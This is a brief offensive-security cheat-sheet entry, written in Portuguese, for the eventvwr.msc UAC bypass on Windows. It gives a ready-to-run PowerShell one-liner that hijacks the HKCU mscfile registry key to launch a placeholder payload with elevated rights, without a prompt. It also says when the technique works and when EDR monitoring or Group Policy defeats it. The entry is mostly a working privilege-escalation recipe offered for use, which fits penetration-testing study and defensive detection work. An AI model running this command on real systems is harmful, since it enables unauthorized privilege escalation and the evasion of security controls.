UAC bypass eventvwr
New-Item "HKCU:\Software\Classes\mscfile\shell\open\command" -Force ; Set-ItemProperty "HKCU:\Software\Classes\mscfile\shell\open\command" -Name "(default)" -Value "<payload>" ; Start-Process "C:\Windows\System32\eventvwr.msc"
Bypass de UAC abusando de eventvwr.msc: sequestra a chave HKCU de mscfile para que o Visualizador de Eventos (assinado pela Microsoft) execute seu payload elevado.
Quando você tem uma sessão como usuário padrão e quer um processo elevado sem prompt UAC. eventvwr.msc é um binário assinado pela Microsoft que se auto-eleva; ao abri-lo, consulta o registro HKCU antes de HKLM, executando seu comando com token elevado.
Se o EDR monitora a chave mscfile em HKCU (assinatura muito conhecida) ou a auto-elevação está desabilitada por GPO. Em hosts com UAC em 'Always Notify' esta técnica falha (igual a fodhelper).